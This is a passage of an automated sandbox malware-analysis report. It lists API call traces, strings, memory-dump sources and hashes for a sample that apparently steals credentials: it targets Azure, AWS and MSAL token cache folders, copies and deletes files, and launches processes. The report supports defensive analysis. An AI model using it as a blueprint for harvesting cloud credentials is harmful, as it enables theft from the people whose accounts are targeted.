                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000927B1
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?,?,?,?), ref: 000927C3
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B6698), ref: 000927D5
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,2ee1445fc63bc20d0e7966867b13e0e1), ref: 000927E7
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B669C), ref: 000927F9
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00092809
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B66A0), ref: 0009281B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00092824
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,EMPTY), ref: 00092840
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B66AC), ref: 00092852
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00092862
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B66B0), ref: 00092874
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00092881
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000928B7
                                                                                                                                                                                                                                                      • Part of subcall function 00090549: lstrlenA.KERNEL32(?,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 0009054F
                                                                                                                                                                                                                                                      • Part of subcall function 00090549: lstrcpyA.KERNEL32(00000000,00000000,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 00090581
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00092446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00094A8D), ref: 00092460
                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,000B66B4,?), ref: 00092924
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00092932
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
                                                                                                                                                                                                                                                    • String ID: .exe$2ee1445fc63bc20d0e7966867b13e0e1$EMPTY
                                                                                                                                                                                                                                                    • API String ID: 141474312-498064747
                                                                                                                                                                                                                                                    • Opcode ID: 97988bcf71f5e4345236cfbfcff4d6fa417182e76c77e2728b4fdd1b932b8c50
                                                                                                                                                                                                                                                    • Instruction ID: 862110403d14d8bf0f33930fa429486a70e6f40925e8b69f9443c4b15c5f4313
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97988bcf71f5e4345236cfbfcff4d6fa417182e76c77e2728b4fdd1b932b8c50
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4981D7B2D40129ABCF11BF60EC86ADE77B8FB04304F4144A5B758B7162D734AE899F54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000964E2
                                                                                                                                                                                                                                                      • Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00096501
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,\.azure\), ref: 0009651E
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096018
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: FindFirstFileA.KERNEL32(?,?), ref: 0009602F
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB4), ref: 00096050
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB8), ref: 0009606A
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096091
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6647), ref: 000960A5
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960C2
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000960EF
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?), ref: 00096125
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD0), ref: 00096137
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 0009614A
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD4), ref: 0009615C
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 00096170
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00096556
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00096578
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,\.aws\), ref: 00096595
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960D9
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00096229
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: DeleteFileA.KERNEL32(?), ref: 0009629D
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: FindNextFileA.KERNEL32(?,?), ref: 000962FF
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: FindClose.KERNEL32(?), ref: 00096313
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000965CA
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 000965EC
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00096609
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 0009663E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                    • API String ID: 780282842-974132213
                                                                                                                                                                                                                                                    • Opcode ID: d12ce8386464844102aefba75a3c994f33f28a3435c10d3678592805e12c08ef
                                                                                                                                                                                                                                                    • Instruction ID: 0162f74c0e841c9ff32937d5613481629441f6f43e94e1e73f02b8b8c76935b2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d12ce8386464844102aefba75a3c994f33f28a3435c10d3678592805e12c08ef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48418271D8021CAADF14FB60EC4BFDD737CAF09700F4404A6B614AB192EAB59A858F51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0008AC8A
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0008AD94
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0008AD9B
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B73DC,00000000), ref: 0008AE4C
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B73E0), ref: 0008AE74
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0008AE98
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73E4), ref: 0008AEA4
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0008AEAE
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73E8), ref: 0008AEBA
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0008AEC4
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73EC), ref: 0008AED0
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0008AEDA
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73F0), ref: 0008AEE6
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0008AEF0
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73F4), ref: 0008AEFC
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0008AF06
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73F8), ref: 0008AF12
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0008AF1C
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73FC), ref: 0008AF28
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0008AF7A
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0008AF95
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0008AFD8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1139693110-0
                                                                                                                                                                                                                                                    • Opcode ID: 14a33a18b185362ef6a2987de253dbc542c4e5a2a896accb23de58eaaa6c98e3
                                                                                                                                                                                                                                                    • Instruction ID: ef2f7126b416a03656c24439b2a0cbcfaa932609fbc36e3094d8e087ff2570a4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14a33a18b185362ef6a2987de253dbc542c4e5a2a896accb23de58eaaa6c98e3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52C1E332D04109EFDF01BBA0EC4A9EE7BB4FF04700F514066F691BB062DB216E56AB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                    • String ID: Dw$block
                                                                                                                                                                                                                                                    • API String ID: 3407564107-2407447776
                                                                                                                                                                                                                                                    • Opcode ID: 1dc37ce4c6daf1b1ad7f9b2dd32ce6b935e14bf063ce8af6b0382940b9e80526
                                                                                                                                                                                                                                                    • Instruction ID: a0668b14c39a8a948b7b6772cbaf5e037912495ac4f941314c3f304799ad7149
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dc37ce4c6daf1b1ad7f9b2dd32ce6b935e14bf063ce8af6b0382940b9e80526
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0419FB0A40205BFDF506F70BC49FAB7BA8FB2474A7105266F616EA050FB34DA40AF51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,759183C0,00000000,0009C55B,?), ref: 0009B875
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(759183C0,000B613C), ref: 0009B8A3
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(759183C0,.zip), ref: 0009B8B3
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(759183C0,.zoo), ref: 0009B8BF
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(759183C0,.arc), ref: 0009B8CB
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(759183C0,.lzh), ref: 0009B8D7
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(759183C0,.arj), ref: 0009B8E3
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(759183C0,.gz), ref: 0009B8EF
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(759183C0,.tgz), ref: 0009B8FB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
